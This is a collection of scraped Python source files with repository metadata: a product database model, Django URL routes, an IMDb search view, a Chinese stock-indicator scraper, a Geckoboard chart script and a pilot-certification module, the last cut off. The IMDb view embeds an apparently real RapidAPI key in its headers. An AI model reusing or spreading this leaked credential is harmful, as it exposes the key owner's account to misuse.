            product_info = {'id': product.id,
                            'name': product.name,
                            'image': product.image,
                            'description': product.description,
                            'category_name': category_name,
                            'subcategory_name': subcategory_name}
            products.append(product_info)
        # Filter products for search action: case-insensitive substring match
        # against name, category or subcategory.
        if search_string:
            if len(products):
                filterd_products = [product for product in products
                                    if search_string.lower() in product["name"].lower()
                                    or search_string.lower() in product["category_name"].lower()
                                    or search_string.lower() in product["subcategory_name"].lower()]
                products = filterd_products
        # If browsing by category (and no search was made), require an exact
        # match on BOTH category and subcategory names.
        if subcategory_item and not search_string:
            if len(products):
                filterd_products = list(filter(lambda product : True
                                               if product['subcategory_name'] == subcategory_item
                                               and product['category_name'] == category_item
                                               else False, products))
                products = filterd_products
    else:
        # Detail view: one product with its size/color child collections.
        product = db.session.query(ProductDB).get(id)
        sizes = product.sizes
        colors = product.colors
        product_info = {'id': product.id,
                        'name': product.name,
                        'image': product.image,
                        'description': product.description,
                        'stocks': product.stocks,
                        'price': product.price,
                        'material': product.material,
                        'composition': product.composition,
                        'care': product.care,
                        'exchange': product.exchange,
                        'country': product.country,
                        'sizes': [size.size for size in sizes],
                        'colors': [color.color for color in colors]}
        products.append(product_info)
    return products
def add_products(products):
    """Insert product records (with their size/color children) into the DB.

    :param products: list of dicts carrying the ProductDB column values plus
                     'sizes' and 'colors' lists.
    :return: True when every product was inserted, False if any insert raised.
    """
    try:
        # Add to main product
        for product in products:
            # Add main product
            new_product = ProductDB(name=product['name'],
                                    image=product['image'],
                                    description=product['description'],
                                    stocks=product['stocks'],
                                    price=product['price'],
                                    material=product['material'],
                                    composition=product['composition'],
                                    care=product['care'],
                                    exchange=product['exchange'],
                                    country=product['country'],
                                    subcategory_id=product['subcategory_id'])
            # Add size rows; cascaded through the relationship collection.
            sizes = [ProductSizes(size=size) for size in product['sizes']]
            new_product.sizes.extend(sizes)
            # Add color rows, same mechanism as sizes.
            colors = [ProductColors(color=color) for color in product['colors']]
            new_product.colors.extend(colors)
            db.session.add(new_product)
            # NOTE(review): committing inside the loop means a failure
            # part-way through leaves earlier products committed -- this is
            # not an all-or-nothing batch.
            db.session.commit()
    except Exception as e:
        # Best-effort: log the failure and report it to the caller.
        print(e)
        return False
    finally:
        # Always release the session, success or failure.
        db.session.close()
    return True
def delete_products(product_ids:list, is_delete_all:bool=False):
    """Delete the given products (or the whole table) plus their size/color rows.

    :param product_ids: ids to delete; ignored when is_delete_all is True.
    :param is_delete_all: when True, truncate all three tables.
    :return: True on success, False on empty input or DB error.
    """
    if not is_delete_all:
        # Nothing to do without ids -- treat as a caller error.
        if not len(product_ids): return False
        products = db.session.query(ProductDB).filter(ProductDB.id.in_(product_ids)).all()
        try:
            for product in products:
                # Children are removed with bulk query deletes, the parent via
                # the session (bulk deletes bypass ORM-level cascades).
                ProductSizes.query.filter(ProductSizes.product_id == product.id).delete()
                ProductColors.query.filter(ProductColors.product_id == product.id).delete()
                db.session.delete(product)
            db.session.commit()
        except Exception as e:
            print(e)
            return False
        finally:
            db.session.close()
    else:
        try:
            # Wipe children first so no orphan rows survive the parent delete.
            ProductSizes.query.delete()
            ProductColors.query.delete()
            counts = db.session.query(ProductDB).delete()
            db.session.commit()
            print(f'Deleted {counts} entries.')
        except Exception as e:
            print(e)
            return False
        finally:
            db.session.close()
return True | holajoyceciao/MCloset | mystoreapp/py_files/models/product.py | product.py | py | 5,389 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "utils.database.db.session.query",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "utils.database.Product",
"line_number": 9,
"usage_type": "argument"
},
{
"api_name": "utils.database.db.session",
"line_number": 9,
"usage_type": "attribute"
},
{... |
73274037545 | from django.urls import re_path
from . import views
# URL table for the marketing app: three role sections (Marketing TL,
# Data Collector, Marketing Executive), each with task, report and
# attendance routes mapped onto views of the same name.
urlpatterns = [
    # Marketing TL
    # My tasks
    # re_path(r'^$', views.index),
    re_path(r'^marketingTL_dashboard$', views.marketingTL_dash, name="marketingTL_dashboard"),
    re_path(r'^mytasks$', views.marketingTL_mytasks, name="marketingTL_mytasks"),
    re_path(r'^products$', views.marketingTL_products, name="marketingTL_products"),
    re_path(r'^product_details$', views.marketingTL_productdet, name="marketingTL_productdet"),
    re_path(r'^recruitments$', views.marketingTL_recruitments, name="marketingTL_recruitments"),
    re_path(r'^recruitment_details$', views.marketingTL_recdet, name="marketingTL_recdet"),
    # Shared tasks
    re_path(r'^sharedtasks$', views.marketingTL_sharedtasks, name="marketingTL_sharedtasks"),
    re_path(r'^shared_products$', views.marketingTL_sharedproducts, name="marketingTL_sharedproducts"),
    re_path(r'^shared_productdetails$', views.marketingTL_Sproductdet, name="marketingTL_Sproductdet"),
    # NOTE(review): the next pattern (and view_recruitmentdata below) has no
    # trailing `$` anchor, unlike every sibling route, so it also matches any
    # URL that merely starts with this prefix -- confirm whether intentional.
    re_path(r'^view_productdata', views.marketingTL_productdata, name="marketingTL_productdata"),
    re_path(r'^shared_recruitments$', views.marketingTL_sharedrecruitments, name="marketingTL_sharedrecruitments"),
    re_path(r'^shared_recruitmentdetails$', views.marketingTL_Srecdet, name="marketingTL_Srecdet"),
    re_path(r'^view_recruitmentdata', views.marketingTL_recdata, name="marketingTL_recdata"),
    # Reports
    re_path(r'^report_issue$', views.marketingTL_reportissue, name="marketingTL_reportissue"),
    re_path(r'^reported_issues$', views.marketingTL_reportedissues, name="marketingTL_reportedissues"),
    re_path(r'^view_reportedissue$', views.marketingTL_viewissue, name="marketingTL_viewissue"),
    # Attendance
    re_path(r'^give_attendance$', views.marketingTL_giveattendance, name="marketingTL_giveattendance"),
    re_path(r'^view_attendance$', views.marketingTL_viewattendance, name="marketingTL_viewattendance"),
    re_path(r'^show_attendance$', views.marketingTL_showattendance, name="marketingTL_showattendance"),
    # Data Collector
    re_path(r'^dc_dash$', views.dc_dash, name="dc_dash"),
    # Tasks
    re_path(r'^dc_mytasks$', views.dc_mytasks, name="dc_mytasks"),
    re_path(r'^dc_products$', views.dc_products, name="dc_products"),
    re_path(r'^dc_productdet$', views.dc_productdet, name="dc_productdet"),
    re_path(r'^collect_productdata$', views.collect_productdata, name="collect_productdata"),
    re_path(r'^dc_recruitments$', views.dc_recruitments, name="dc_recruitments"),
    re_path(r'^dc_recdet$', views.dc_recdet, name="dc_recdet"),
    re_path(r'^collect_recdata$', views.collect_recdata, name="collect_recdata"),
    # Reports
    re_path(r'^dc_reportissue$', views.dc_reportissue, name="dc_reportissue"),
    re_path(r'^dc_reportedissues$', views.dc_reportedissues, name="dc_reportedissues"),
    re_path(r'^dc_viewissue$', views.dc_viewissue, name="dc_viewissue"),
    # Attendance
    re_path(r'^dc_viewattendance$', views.dc_viewattendance, name="dc_viewattendance"),
    re_path(r'^dc_showattendance$', views.dc_showattendance, name="dc_showattendance"),
    # Marketing Executive
    re_path(r'^exec_dash$', views.exec_dash, name="exec_dash"),
    # Tasks
    re_path(r'^exec_mytasks$', views.exec_mytasks, name="exec_mytasks"),
    re_path(r'^exec_products$', views.exec_products, name="exec_products"),
    re_path(r'^exec_productdet$', views.exec_productdet, name="exec_productdet"),
    re_path(r'^exec_productdata$', views.exec_productdata, name="exec_productdata"),
    re_path(r'^exec_recruitments$', views.exec_recruitments, name="exec_recruitments"),
    re_path(r'^exec_recdet$', views.exec_recdet, name="exec_recdet"),
    re_path(r'^exec_recdata$', views.exec_recdata, name="exec_recdata"),
    # Reports
    re_path(r'^exec_reportissue$', views.exec_reportissue, name="exec_reportissue"),
    re_path(r'^exec_reportedissues$', views.exec_reportedissues, name="exec_reportedissues"),
    re_path(r'^exec_viewissue$', views.exec_viewissue, name="exec_viewissue"),
    # Attendance
    re_path(r'^exec_viewattendance$', views.exec_viewattendance, name="exec_viewattendance"),
    re_path(r'^exec_showattendance$', views.exec_showattendance, name="exec_showattendance"),
]
| Emil-20/infoxmain | marketingapp/urls.py | urls.py | py | 4,392 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "django.urls.re_path",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "django.urls.re_path",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "django.urls.re_path",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "django.ur... |
41911943994 | from django.shortcuts import render
from .forms import *
from django.http import HttpResponse
import requests
def index(request):
    """Render the search page; on POST, look up the submitted title via the
    IMDb auto-complete API and show the top three matches.

    Expected failures (missing fields in the API payload, fewer than three
    results) are caught and reported to the template through the
    ``no_errors`` flag, exactly as before.
    """
    # try-except excludes KeyError/IndexError: the API response may lack
    # fields or entries this view reads.
    try:
        # accepting POST request
        film_title = request.POST.get('message', '')
        # when POST has been made, the webpage changes
        if request.method == 'POST':
            url = "https://imdb8.p.rapidapi.com/auto-complete"
            querystring = {"q": str(film_title)}
            # SECURITY(review): the RapidAPI key is hard-coded in source
            # control. Move it to settings/environment config and rotate it.
            headers = {
                "X-RapidAPI-Key": "62008096b2mshfb208128fa454d7p14c074jsne7881457ef9a",
                "X-RapidAPI-Host": "imdb8.p.rapidapi.com"
            }
            response = requests.request("GET", url, headers=headers, params=querystring)
            # Parse the body once: every response.json() call re-parses the
            # payload, and the original code did so a dozen times.
            results = response.json()["d"]
            # Build the context for the top three matches. The template
            # expects suffixed keys: title/title1/title2, image_url/..., etc.
            context = {
                'is_post_request': True,
                'errors': False,
            }
            for idx in range(3):
                entry = results[idx]  # IndexError -> handled below
                suffix = '' if idx == 0 else str(idx)
                context['title' + suffix] = entry["l"].replace('\'', '')
                context['image_url' + suffix] = entry["i"]["imageUrl"]  # KeyError -> handled below
                context['year' + suffix] = str(entry["y"])
                context['cast' + suffix] = entry["s"].replace('\'', '')
            return render(request, 'main/index.html', context)
        # when POST has not been made. Basically, the first page
        return render(request, 'main/index.html', {'is_post_request': False, 'no_errors': False})
    except (KeyError, IndexError):
        return render(request, 'main/index.html', {'is_post_request': False, 'no_errors': True})
| adilluos/Movie-Searcher | WebProject/taskmanager/main/views.py | views.py | py | 3,026 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "requests.request",
"line_number": 25,
"usage_type": "call"
},
{
"api_name": "django.shortcuts.render",
"line_number": 69,
"usage_type": "call"
},
{
"api_name": "django.shortcuts.render",
"line_number": 71,
"usage_type": "call"
},
{
"api_name": "djan... |
70606654505 | import multiprocessing
import os
import sys
import time
import warnings
from datetime import date
import akshare as ak
import numpy as np
import pandas as pd
warnings.filterwarnings("ignore")
# pandas console display / output settings
pd.set_option('max_rows', None)
pd.set_option('max_columns', None)
pd.set_option('expand_frame_repr', False)
pd.set_option('display.unicode.ambiguous_as_wide', True)
pd.set_option('display.unicode.east_asian_width', True)
# On Linux the local packages are not found on sys.path, so add a temporary search directory.
curPath = os.path.abspath(os.path.dirname(__file__))
rootPath = os.path.split(curPath)[0]
sys.path.append(rootPath)
from util.DBUtils import sqlalchemyUtil
from util.CommonUtils import get_process_num, get_code_group, get_code_list
# The upstream API is too fragile -- do not spawn too many processes.
def multiprocess_run(code_list, start_date, engine, process_num = 2):
    """Fan the stock list out over worker processes and bulk-insert the rows.

    :param code_list: list of (code, name) pairs to process
    :param start_date: earliest announcement date to keep (YYYYMMDD)
    :param engine: SQLAlchemy engine used for the INSERTs
    :param process_num: worker process count -- deliberately small because the
                        upstream API is fragile (see comment above the def)
    """
    code_group = get_code_group(process_num, code_list)
    result_list = []
    with multiprocessing.Pool(processes=process_num) as pool:
        # Multi-process asynchronous computation.
        for i in range(len(code_group)):
            codes = code_group[i]
            # Arguments for apply_async() must be passed as a tuple; note the
            # trailing comma -- without it the task is not submitted to the
            # pool correctly.
            result_list.append(pool.apply_async(get_group_data, args=(codes, start_date, i, len(code_group), len(code_list),)))
        # Stop further task submission to the pool.
        pool.close()
        # Wait for all worker processes to finish.
        pool.join()
    # delete_sql = '''truncate table ods_financial_analysis_indicator_di;'''
    # engine.execute(delete_sql)
    for r in result_list:
        rl = r.get()
        if rl:
            # Write to MySQL; INSERT IGNORE skips duplicate primary keys so
            # re-runs are idempotent.
            engine.execute(
                """
                insert ignore into ods_financial_analysis_indicator_di (announcement_date, stock_code, stock_name, ps_business_cash_flow,
                                            return_on_equity, npadnrgal, net_profit_growth_rate)
                values (%s, %s, %s, %s, %s, %s, %s);
                """, rl
            )
        else:
            print('rl为空')
    print('ods_financial_analysis_indicator_di:执行完毕!!!')
def get_group_data(code_list, start_date, i, n, total):
    """Collect indicator rows for one group of stock codes.

    Each element of code_list carries the stock code and name in positions 0
    and 1. Rows from every non-empty result frame are flattened into a single
    list suitable for a bulk INSERT. The i/n/total arguments only describe
    this group's position for progress reporting.
    """
    rows = []
    for entry in code_list:
        frame = get_data(entry[0], entry[1], start_date)
        if not frame.empty:
            rows.extend(np.array(frame).tolist())
    return rows
def get_data(ak_code, ak_name, start_date):
    """Download and normalise financial-analysis indicators for one stock.

    :param ak_code: bare 6-digit stock code understood by akshare
    :param ak_name: display name of the stock
    :param start_date: keep announcement dates on/after this date (YYYYMMDD)
    :return: DataFrame shaped like the target table; empty DataFrame on failure
    """
    # range(1) == a single attempt; raise the bound to enable simple retries.
    for _attempt in range(1):
        try:
            # Sina Finance: financial analysis indicators.
            df = ak.stock_financial_analysis_indicator(symbol=ak_code)
            if df.empty:
                continue
            # Keep announcements on/after start_date ('日期' is the report-date column).
            df = df[pd.to_datetime(df['日期']) >= pd.to_datetime(start_date)]
            # Prefix the exchange: 6xxxxx -> Shanghai, 8xxxxx/4xxxxx -> Beijing,
            # everything else -> Shenzhen.
            if ak_code.startswith('6'):
                df['stock_code'] = 'sh' + ak_code
            elif ak_code.startswith(('8', '4')):  # tuple form replaces `... or ... == True`
                df['stock_code'] = 'bj' + ak_code
            else:
                df['stock_code'] = 'sz' + ak_code
            df['stock_name'] = ak_name
            df.rename(columns={'日期':'announcement_date','每股经营性现金流(元)':'ps_business_cash_flow','净资产收益率(%)':'return_on_equity','扣除非经常性损益后的净利润(元)':'npadnrgal','净利润增长率(%)':'net_profit_growth_rate'}, inplace=True)
            df = df[['announcement_date','stock_code','stock_name','ps_business_cash_flow','return_on_equity','npadnrgal','net_profit_growth_rate']]
            # MySQL cannot store NaN; convert to None so it becomes NULL.
            df = df.replace({np.nan: None})
            return df
        except Exception as e:
            # Best-effort scrape: log and fall through to an empty frame.
            print(e)
    # Bug fix: the original returned the DataFrame *class* (`pd.DataFrame`),
    # not an instance, so callers received a type object instead of an empty
    # frame (`.empty` on the class yields a property object, not a bool).
    return pd.DataFrame()
# nohup python ods_financial_analysis_indicator_di.py update 20221010 >> my.log 2>&1 &
# A full ('all') run is very slow; don't run it routinely -- normally fetch only the latest date.
if __name__ == '__main__':
    code_list = get_code_list()
    # Default window: today only; 'all' rebuilds from 2021-01-01.
    start_date = date.today().strftime('%Y%m%d')
    # NOTE(review): end_date is assigned but never read below -- confirm the
    # end bound was meant to be forwarded to multiprocess_run.
    end_date = start_date
    if len(sys.argv) == 1:
        print("请携带一个参数 all update 更新要输入开启日期 结束日期 不输入则默认当天")
    elif len(sys.argv) == 2:
        run_type = sys.argv[1]
        if run_type == 'all':
            start_date = '20210101'
        else:
            start_date = date.today().strftime('%Y%m%d')
    # NOTE(review): this branch corresponds to 3 CLI arguments
    # (len(sys.argv) == 4), but sys.argv[3] -- presumably the end date --
    # is never read. Confirm intended behaviour.
    elif len(sys.argv) == 4:
        run_type = sys.argv[1]
        start_date = sys.argv[2]
    engine = sqlalchemyUtil().engine
    start_time = time.time()
    multiprocess_run(code_list, start_date, engine)
    # Release pooled connections before reporting the elapsed time.
    engine.dispose()
    end_time = time.time()
print('程序运行时间:{}s,{}分钟'.format(end_time - start_time, (end_time - start_time) / 60)) | cgyPension/pythonstudy_space | 05_quantitative_trading_mysql/ods/ods_financial_analysis_indicator_di.py | ods_financial_analysis_indicator_di.py | py | 5,216 | python | en | code | 7 | github-code | 36 | [
{
"api_name": "warnings.filterwarnings",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "pandas.set_option",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "pandas.set_option",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "pandas.se... |
10507399118 | import argparse
import sys
import json
import pickle
import os
import time
status_colors_hex = {
'200': '#6FB665',
'204': '#4FA29F',
'400': '#D8C726',
'404': '#F06A2A',
'406': '#78CAEF',
'414': '#86F6D2',
'500': '#043E8A',
'502': '#A81E03',
}
def fetch_input(stats_file):
    """Parse a uniq-count-style stats file into a list of dicts.

    Each line of *stats_file* holds two whitespace-separated fields,
    e.g. ``7 200`` -> ``{'count': '7', 'code': '200'}``. Values stay
    strings, matching what the rest of the pipeline expects.
    """
    data = []
    # Bug fix: the Python-2-only builtin `file()` is replaced with `open()`
    # (valid on Python 2 and 3), and the context manager guarantees the
    # handle is closed even when parsing raises mid-file.
    with open(stats_file, 'r') as file_resource:
        for line in file_resource:
            data.append(dict(zip(['count', 'code'], line.strip().split())))
    return data
def unpack_data(rows):
    """
    Reshape stored (date, [{'count': ..., 'code': ...}, ...]) rows into the
    categories/series structure the highcharts config expects.

    Input:
    [('2014-12-10', [{'count': '7', 'code': '200'}, ...]),
     ('2014-12-11', [{'count': '9', 'code': '200'}, ...])]

    Output example:
    categories = ['2014-12-10', '2014-12-11']
    series = [{"color": "#6FB665", "name": "http 200", "data": [7, 9]}, ...]

    NOTE(review): a comment in the original mentioned limiting output to the
    last 23 points for geckoboard, but no truncation is actually performed --
    confirm whether that limit is still required.
    """
    categories = []
    per_code_counts = {}
    for day, code_entries in sorted(rows):  # stored data can be appended in any order
        categories.append(day)
        for item in code_entries:
            per_code_counts.setdefault(item['code'], []).append(int(item['count']))
    # One series per status code, coloured from the module-level palette.
    series = [{"color": status_colors_hex.get(code, '#fff'),
               "name": "http %s" % code,
               "data": counts}
              for code, counts in per_code_counts.items()]
    return {'categories': categories, 'series': series}
def update_graph_data(config, new_record):
    """
    Append *new_record* to the pickled history file and return chart data.

    new_record is a (date, stats) tuple, e.g.
        ('2014-12-10', [{'code': 501, 'count': 1}, {'code': 200, 'count': 340132}])
    The on-disk pickle is a dict {'index': [dates...], 'data': [records...]}.
    The record is appended unless its date is already present; setting
    config['force_update'] appends anyway (with a warning on stderr).
    Returns unpack_data() applied to all stored records.
    """
    exists = os.path.isfile(config['history_file'])
    schema = {'index': [], 'data': []}
    if exists:
        # Pickle streams must be read in binary mode under Python 3 (and the
        # Python 2 file() builtin no longer exists).
        with open(config['history_file'], 'rb') as dump:
            all_entries = pickle.load(dump)
    else:
        # No history yet: start from the empty schema without opening the
        # file in 'w' mode just to have an (unused) handle.
        all_entries = schema
    the_date = new_record[0]
    if the_date not in all_entries['index'] or config['force_update']:
        if the_date in all_entries['index']:
            sys.stderr.write('warning: writing duplicate entry\n')
        all_entries['data'].append(new_record)
        all_entries['index'].append(the_date)
    else:
        sys.stderr.write('warning: did not append, data found in index\n')
    with open(config['history_file'], 'wb') as dump:
        pickle.dump(all_entries, dump)
    return unpack_data(all_entries['data'])
def chart_config(api_key, chart_data):
    """Build the shell-quoted Geckoboard/Highcharts payload string.

    chart_data is the {'categories': [...], 'series': [...]} dict produced
    by unpack_data().  Returns a single-quoted JSON string suitable for
    direct interpolation into a shell command line.
    """
    # https://developer.geckoboard.com/#highcharts-example
    chart = {
        "chart": {
            "style": {"color": "#b9bbbb"},
            "renderTo": "container",
            "backgroundColor": "transparent",
            "lineColor": "rgba(35,37,38,100)",
            "plotShadow": False,
        },
        "credits": {"enabled": False},
        "title": {
            "style": {"color": "#b9bbbb"},
            "text": "Daily HTTP Status Codes",
        },
        "xAxis": {"categories": chart_data['categories']},
        "yAxis": {"title": {"style": {"color": "#b9bbbb"}, "text": "HTTP Requests"}},
        "legend": {
            "itemStyle": {"color": "#b9bbbb"},
            "layout": "vertical",
            "align": "right",
            "verticalAlign": "middle",
            "borderWidth": 0,
        },
        "series": chart_data['series'],
    }
    # Escape every double quote so the chart JSON can be embedded as a
    # string value inside the outer JSON document.
    escaped = json.dumps(chart).replace('"', '\\"')
    # The payload is wrapped in single quotes: the shell passes single-quoted
    # text through verbatim (nothing inside is interpreted).
    return '\'{"api_key": "%s", "data": {"highchart": "%s"}}\'' % (api_key, escaped)
# Command-line entry point: parse arguments, append today's stats to the
# pickled history file, and print the shell-quoted Geckoboard payload.
if __name__ == '__main__':
    parser = argparse.ArgumentParser(prog='update_graph_data',
                                     description=("Appends given data to graph data in Javascript format."
                                                  ". Which can be accepted by Highcharts (Geckoboard API)"),
                                     add_help=True)
    parser.add_argument('filepath', type=str, help='Path to the stats file. (output from uniq -c)')
    parser.add_argument('--history', dest='history_file', type=str, help='Path to the stats file. (output from uniq -c)', required=True)
    parser.add_argument('--force-update', action='store_true', help='Force to update the history file, if the date already exists on disk')
    # NOTE(review): this help text looks copy-pasted from --date.
    parser.add_argument('--api-key', type=str, help='Date of this graph stats in YYYYmmdd', required=True)
    parser.add_argument('--date', type=str, help='Date of this graph stats in YYYYmmdd')
    args = parser.parse_args()
    # The argparse namespace doubles as a plain config dict downstream.
    config = args.__dict__
    if config['force_update']:
        # Give the operator a moment to abort before duplicating data.
        sys.stderr.write('warning: using --force-update, this will append data and possibly duplicate \n')
        sys.stderr.write('warning: press ^C to cancel (program starts in 1 second..)\n')
        time.sleep(1)
    new_record = (config['date'], fetch_input(args.filepath))
    chart_data = update_graph_data(config, new_record)
    sys.stdout.write(chart_config(config['api_key'], chart_data))
#test:
#data = [('2014-12-10', [{'count': '7', 'code': '200'}, {'count': '3', 'code': '204'}]),
# ('2014-12-11', [{'count': '9', 'code': '200'}, {'count': '1', 'code': '204'}]),
# ('2014-12-13', [{'count': '3', 'code': '200'}, {'count': '2', 'code': '204'}])]
#unpacked = unpack_data(data)
| stefanooldeman/gecko_http_codes | update_graph_data.py | update_graph_data.py | py | 6,440 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "os.path.isfile",
"line_number": 87,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 87,
"usage_type": "attribute"
},
{
"api_name": "pickle.load",
"line_number": 90,
"usage_type": "call"
},
{
"api_name": "sys.stderr.write",
"line_... |
26319259400 | """
Module determining pilot certifications, ratings, and endorsements.
The restrictions that we place on a pilot depend on their qualifications. There are three
ways to think about a pilot.
(1) Certifications. These are what licenses a pilot has. We also use these to classify
where the student is in the licensing process. Is the student post solo (can fly without
instructor), but before license? Is the student 50 hours past their license (a threshold
that helps with insurance)?
(2) Ratings. These are extra add-ons that a pilot can add to a license. For this project,
the only rating is Instrument Rating, which allows a pilot to fly through adverse weather
using only instruments.
(3) Endorsements. These are permission to fly certain types of planes solo. Advanced
allows a pilot to fly a plane with retractable landing gear. Multiengine allows a pilot
to fly a plane with more than one engine.
The file pilots.csv is a list of all pilots in the school, together with the dates that
they earned these certifications, ratings, and endorsements. Specifically, this CSV file
has the following header:
ID LASTNAME FIRSTNAME JOINED SOLO LICENSE 50 HOURS INSTRUMENT ADVANCED MULTIENGINE
The first three columns are strings, while all other columns are dates.
The functions in this class take a row from the pilot table and determine if a pilot has
a certain qualification at the time of takeoff. As this program is auditing the school
over a course of a year, a student may not be instrument rated for one flight but might
be for another.
The preconditions for many of these functions are quite messy. While this makes writing
the functions simpler (because the preconditions ensure we have less to worry about),
enforcing these preconditions can be quite hard. That is why it is not necessary to
enforce any of the preconditions in this module.
Author: Christopher Jordan
Date: September 18, 2021
"""
import utils
# CERTIFICATION CLASSIFICATIONS
# The certification of this pilot is unknown
PILOT_INVALID = -1
# A pilot that has joined the school, but has not soloed
PILOT_NOVICE = 0
# A pilot that has soloed but does not have a license
PILOT_STUDENT = 1
# A pilot that has a license, but has under 50 hours post license
PILOT_CERTIFIED = 2
# A pilot that 50 hours post license
PILOT_50_HOURS = 3
def get_certification(takeoff,student):
    """
    Returns the certification classification for this student at the time of takeoff.

    The certification is represented by an int, and must be the value PILOT_NOVICE,
    PILOT_STUDENT, PILOT_CERTIFIED, PILOT_50_HOURS, or PILOT_INVALID. It is
    PILOT_50_HOURS if the student has certified '50 Hours' before this flight
    takeoff. It is PILOT_CERTIFIED if the student has a private license before
    this takeoff and PILOT_STUDENT if the student has soloed before this takeoff.
    A pilot that has only just joined the school is PILOT_NOVICE. If the flight
    takes place before the student has even joined the school, the result is
    PILOT_INVALID.

    Recall that a student is a 10-element list of strings. The first three elements
    are the student's identifier, last name, and first name. The remaining elements
    are all timestamps: time joining the school, time of first solo, time of
    private license, time of 50 hours certification, time of instrument rating,
    time of advanced endorsement, and time of multiengine endorsement.

    Parameter takeoff: The takeoff time of this flight
    Precondition: takeoff is a datetime object

    Parameter student: The student pilot
    Precondition: student is 10-element list of strings representing a pilot
    """
    # Parse only the four milestones that matter here (joined, first solo,
    # license, 50 hours).  Missing milestones stay '' so they can be skipped.
    # Parsed times are coerced into takeoff's timezone so every comparison is
    # between timezone-aware datetimes.
    tz_i = takeoff.tzinfo
    stamps = []
    for text in student[3:7]:
        if text != '':
            stamps.append(utils.str_to_time(text).replace(tzinfo=tz_i))
        else:
            stamps.append(text)
    joined, soloed, licensed, fifty_hours = stamps
    # Walk from the most advanced milestone down; the first milestone that has
    # been achieved (non-empty and strictly before takeoff) decides the level.
    # Skipping empty entries also avoids comparing a datetime against '' when
    # the milestones are not contiguous (the original could raise there).
    for stamp, level in ((fifty_hours, PILOT_50_HOURS),
                         (licensed, PILOT_CERTIFIED),
                         (soloed, PILOT_STUDENT)):
        if stamp != '' and takeoff > stamp:
            return level
    # A takeoff at or after the join time (but before any later milestone) is
    # a novice flight; earlier than the join time -- or no join date at all --
    # is invalid.  (The original implicitly returned None when takeoff was
    # exactly equal to the join time.)
    if joined != '' and takeoff >= joined:
        return PILOT_NOVICE
    return PILOT_INVALID
def has_instrument_rating(takeoff,student):
    """
    Returns True if the student has an instrument rating at the time of takeoff,
    False otherwise.

    The rating timestamp is student[7]; an empty string means the rating was
    never earned.

    NOTE: Just because a pilot has an instrument rating does not mean that every
    flight with that pilot is an IFR flight.  It just means the pilot could
    choose to use VFR or IFR rules.

    Parameter takeoff: The takeoff time of this flight
    Precondition: takeoff is a datetime object

    Parameter student: The student pilot
    Precondition: student is 10-element list of strings representing a pilot
    """
    earned = student[7]
    return earned != '' and takeoff > utils.str_to_time(earned)
def has_advanced_endorsement(takeoff,student):
    """
    Returns True if the student has an endorsement to fly an advanced plane at
    the time of takeoff; False otherwise.

    The endorsement timestamp is student[8]; an empty string means the
    endorsement was never earned.

    Parameter takeoff: The takeoff time of this flight
    Precondition: takeoff is a datetime object

    Parameter student: The student pilot
    Precondition: student is 10-element list of strings representing a pilot
    """
    earned = student[8]
    return earned != '' and takeoff > utils.str_to_time(earned)
def has_multiengine_endorsement(takeoff,student):
    """
    Returns True if the student has an endorsement to fly a multiengine plane at
    the time of takeoff; False otherwise.

    The endorsement timestamp is student[9]; an empty string means the
    endorsement was never earned.

    Parameter takeoff: The takeoff time of this flight
    Precondition: takeoff is a datetime object

    Parameter student: The student pilot
    Precondition: student is 10-element list of strings representing a pilot
    """
    earned = student[9]
    return earned != '' and takeoff > utils.str_to_time(earned)
def get_minimums(cert, area, instructed, vfr, daytime, minimums):
    """
    Returns the most advantageous minimums for the given flight category.

    The minimums table (including header) has the columns

        CATEGORY  CONDITIONS  AREA  TIME  CEILING  VISIBILITY  WIND  CROSSWIND

    A row matches when ALL of the first four columns match the parameters:

    * CATEGORY: 'Student' matches PILOT_STUDENT or higher, 'Certified'
      matches PILOT_CERTIFIED or higher, '50 Hours' matches only
      PILOT_50_HOURS, and 'Dual' matches only when instructed is True.
    * CONDITIONS: 'VMC' when vfr is True, 'IMC' otherwise.
    * AREA: flights in the pattern or practice area also match 'Local';
      every flight matches 'Any'.
    * TIME: 'Day' when daytime is True, 'Night' otherwise.

    From the matching rows the function returns [ceiling, visibility, wind,
    crosswind] as floats, taking the LOWEST ceiling and visibility and the
    HIGHEST wind and crosswind.  If no row matches, it returns None.

    Parameter cert: The pilot certification
    Precondition: cert is an int and one of PILOT_NOVICE, PILOT_STUDENT,
    PILOT_CERTIFIED, PILOT_50_HOURS, or PILOT_INVALID.

    Parameter area: The flight area for this flight plan
    Precondition: area is a string and one of 'Pattern', 'Practice Area' or
    'Cross Country'

    Parameter instructed: Whether an instructor is present
    Precondition: instructed is a boolean

    Parameter vfr: Whether the pilot has filed this as an VFR flight
    Precondition: vfr is a boolean

    Parameter daytime: Whether this flight is during the day
    Precondition: daytime is boolean

    Parameter minimums: The table of allowed minimums
    Precondition: minimums is a 2d-list (table) as described above, including
    header
    """
    # CATEGORY values that apply to this certification level.  The cert
    # constants are ordered (student=1, certified=2, 50 hours=3), so >=
    # comparisons replace the original duplicated append chains.
    category_matches = []
    if cert >= 1:
        category_matches.append('Student')
    if cert >= 2:
        category_matches.append('Certified')
    if cert >= 3:
        category_matches.append('50 Hours')
    if instructed:
        category_matches.append('Dual')
    conditions = 'VMC' if vfr else 'IMC'
    # 'Any' matches every flight; pattern/practice flights also count as local.
    area_matches = ['Any', area]
    if area in ('Pattern', 'Practice Area'):
        area_matches.append('Local')
    time_of_day = 'Day' if daytime else 'Night'
    # Skip the header row; a row matches only if all four key columns match.
    matches = [row for row in minimums[1:]
               if row[0] in category_matches and row[1] == conditions
               and row[2] in area_matches and row[3] == time_of_day]
    # Explicit empty check replaces the original blanket try/except (which
    # relied on min([]) raising, and silently hid any other bug as None).
    if not matches:
        return None
    return [min(float(row[4]) for row in matches),
            min(float(row[5]) for row in matches),
            max(float(row[6]) for row in matches),
            max(float(row[7]) for row in matches)]
| ChrisMJordan/eCornell_Cert_Project | pilots.py | pilots.py | py | 16,872 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "utils.str_to_time",
"line_number": 87,
"usage_type": "call"
},
{
"api_name": "utils.str_to_time",
